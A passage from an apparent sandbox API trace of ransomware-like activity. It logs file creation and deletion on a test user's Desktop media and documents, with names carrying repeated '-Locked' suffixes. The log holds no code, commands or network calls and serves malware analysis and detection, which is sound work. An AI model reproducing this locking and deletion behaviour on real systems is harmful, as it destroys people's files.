dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.248] GetFileType (hFile=0x480) returned 0x1 [0311.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.248] GetFileType (hFile=0x480) returned 0x1 [0311.249] CloseHandle (hObject=0x480) returned 1 [0311.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", lpFilePart=0x0) returned 0x39 [0311.250] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked")) returned 1 [0311.251] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0311.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.251] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.252] GetFileType (hFile=0x480) returned 0x1 [0311.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.252] GetFileType (hFile=0x480) returned 0x1 [0311.254] CloseHandle (hObject=0x480) returned 1 [0311.254] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", lpFilePart=0x0) returned 0x40 [0311.254] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked-locked")) returned 1 [0311.255] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", lpFilePart=0x0) returned 0x44 [0311.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.255] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.256] GetFileType (hFile=0x480) returned 0x1 [0311.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.256] GetFileType (hFile=0x480) returned 0x1 [0311.275] CloseHandle (hObject=0x480) returned 1 [0311.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", lpFilePart=0x0) returned 0x3d [0311.276] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked")) returned 1 [0311.277] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0311.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.277] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.278] GetFileType (hFile=0x480) returned 0x1 [0311.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.278] GetFileType (hFile=0x480) returned 0x1 [0311.280] CloseHandle (hObject=0x480) returned 1 [0311.280] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", lpFilePart=0x0) returned 0x44 [0311.280] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked-locked")) returned 1 [0311.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.281] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.281] GetFileType (hFile=0x480) returned 0x1 [0311.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.281] GetFileType (hFile=0x480) returned 0x1 [0311.282] CloseHandle (hObject=0x480) returned 1 [0311.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked", lpFilePart=0x0) returned 0x2f [0311.283] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked")) returned 1 [0311.284] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3d [0311.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.284] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.285] GetFileType (hFile=0x480) returned 0x1 [0311.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.285] GetFileType (hFile=0x480) returned 0x1 [0311.287] CloseHandle (hObject=0x480) returned 1 [0311.287] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.287] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\VL-8wX.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vl-8wx.png-locked-locked")) returned 1 [0311.288] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", lpFilePart=0x0) returned 0x42 [0311.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.288] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.288] GetFileType (hFile=0x480) returned 0x1 [0311.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.288] GetFileType (hFile=0x480) returned 0x1 [0311.290] CloseHandle (hObject=0x480) returned 1 [0311.290] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked", lpFilePart=0x0) returned 0x3b [0311.290] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked")) returned 1 [0311.326] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked-Locked", lpFilePart=0x0) returned 0x49 [0311.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.326] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.327] GetFileType (hFile=0x480) returned 0x1 [0311.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.327] GetFileType (hFile=0x480) returned 0x1 [0311.329] CloseHandle (hObject=0x480) returned 1 [0311.329] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked", lpFilePart=0x0) returned 0x42 [0311.329] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\WJV4 Vo51_-ctoxSde.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wjv4 vo51_-ctoxsde.gif-locked-locked")) returned 1 [0311.330] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", lpFilePart=0x0) returned 0x41 [0311.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.331] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.331] GetFileType (hFile=0x480) returned 0x1 [0311.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.331] GetFileType (hFile=0x480) returned 0x1 [0311.333] CloseHandle (hObject=0x480) returned 1 [0311.334] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked", lpFilePart=0x0) returned 0x3a [0311.334] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked")) returned 1 [0311.340] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x48 [0311.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.341] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.345] GetFileType (hFile=0x480) returned 0x1 [0311.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.346] GetFileType (hFile=0x480) returned 0x1 [0311.348] CloseHandle (hObject=0x480) returned 1 [0311.349] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked", lpFilePart=0x0) returned 0x41 [0311.349] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\y4hqqhoePb18-mRGw.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\y4hqqhoepb18-mrgw.pdf-locked-locked")) returned 1 [0311.350] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5d [0311.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.350] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.351] GetFileType (hFile=0x480) returned 0x1 [0311.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.351] GetFileType (hFile=0x480) returned 0x1 [0311.362] CloseHandle (hObject=0x480) returned 1 [0311.363] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", lpFilePart=0x0) returned 0x56 [0311.363] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a-locked-locked")) returned 1 [0311.364] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x52 [0311.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.364] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.365] GetFileType (hFile=0x480) returned 0x1 [0311.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.365] GetFileType (hFile=0x480) returned 0x1 [0311.367] CloseHandle (hObject=0x480) returned 1 [0311.368] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked", lpFilePart=0x0) returned 0x4b [0311.368] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv-locked-locked")) returned 1 [0311.369] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked-Locked", lpFilePart=0x0) returned 0x58 [0311.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.369] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.370] GetFileType (hFile=0x480) returned 0x1 [0311.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.370] GetFileType (hFile=0x480) returned 0x1 [0311.372] CloseHandle (hObject=0x480) returned 1 [0311.373] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked", lpFilePart=0x0) returned 0x51 [0311.373] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav-locked-locked")) returned 1 [0311.374] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4f [0311.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.374] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.375] GetFileType (hFile=0x480) returned 0x1 [0311.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.375] GetFileType (hFile=0x480) returned 0x1 [0311.377] CloseHandle (hObject=0x480) returned 1 [0311.378] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked", lpFilePart=0x0) returned 0x48 [0311.378] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi-locked-locked")) returned 1 [0311.379] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5b [0311.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.379] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.379] GetFileType (hFile=0x480) returned 0x1 [0311.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.379] GetFileType (hFile=0x480) returned 0x1 [0311.382] CloseHandle (hObject=0x480) returned 1 [0311.382] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked", lpFilePart=0x0) returned 0x54 [0311.383] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt-locked-locked")) returned 1 [0311.384] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5a [0311.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.384] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.385] GetFileType (hFile=0x480) returned 0x1 [0311.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.385] GetFileType (hFile=0x480) returned 0x1 [0311.387] CloseHandle (hObject=0x480) returned 1 [0311.388] GetFullPathNameW (in: 